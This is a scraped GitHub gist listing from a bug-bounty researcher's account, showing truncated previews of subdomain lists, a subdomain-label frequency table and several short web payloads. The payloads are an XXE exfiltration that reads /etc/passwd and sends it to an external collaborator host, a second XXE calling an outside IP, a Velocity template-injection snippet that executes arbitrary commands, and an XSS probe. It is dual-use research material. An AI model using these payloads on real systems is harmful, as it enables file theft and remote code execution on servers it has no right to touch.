Ben Sadeghipour nahamsec
nahamsec
/ gist:a0d01d9f6b89b32a68e7b26c74be691d
Created
September 9, 2024 03:54
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0-asic-qp-cr006rq-dangweb2242.event.flexport.com | |
| 0-assets.event.flexport.com | |
| 0-members.agu.org.unicat.nyeesurgnet.com | |
| 0-webofknowledge.com.emu.nyee2020.com | |
| 0.100.93.177.sent-via.netsuite.com.ttrus.com | |
| 0.hotels.com | |
| 0000.snch.org | |
| 00000eagle.c21.com | |
| 0000confidentialstreet.c21.com | |
| 0000cr637.c21.com |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % xxePOC SYSTEM "file:///etc/passwd"> | |
| <!ENTITY % exfildata "<!ENTITY % exfil SYSTEM 'http://7u2bvf9vu78d9wepre2c3qmg87e82x.burpcollaborator.net/?x=%xxePOC;'>"> | |
| %exfildata; | |
| %exfil; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <!ENTITY % d SYSTEM "https://138.68.23.180:443"> | |
| <!ENTITY % c "<!ENTITY rrr SYSTEM 'ftp://138.68.23.180:443/%d;'>"> |
nahamsec
/ 1stleveldomainsbycount
Created
June 25, 2020 19:44
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| www,719407 | |
| api,69552 | |
| eks,67581 | |
| svc,67131 | |
| cloudapp,65945 | |
| vpn,55659 | |
| bastion,53840 | |
| ax,40676 | |
| dev,38756 | |
| operations,35663 |
nahamsec
/ extracted-subdomains
Created
June 25, 2020 18:51
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| prestigegiftware | |
| 12boxing | |
| 7clouds | |
| alfredhealth | |
| mywell | |
| phdrastreador | |
| halorei | |
| qa2static | |
| hemoservice | |
| astellaspharma |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #set ($e="exp") | |
| #set ($a=$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec($cmd)) | |
| #set ($input=$e.getClass().forName("java.lang.Process").getMethod("getInputStream").invoke($a)) | |
| #set($sc = $e.getClass().forName("java.util.Scanner")) | |
| #set($constructor = $sc.getDeclaredConstructor($e.getClass().forName("java.io.InputStream"))) | |
| #set($scan=$constructor.newInstance($input).useDelimiter("\\A")) | |
| #if($scan.hasNext()) | |
| $scan.next() | |
| #end |
nahamsec
/ gist:143f4dcdc9ca4ef835c17b164939eef0
Created
January 10, 2018 21:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| alert();// |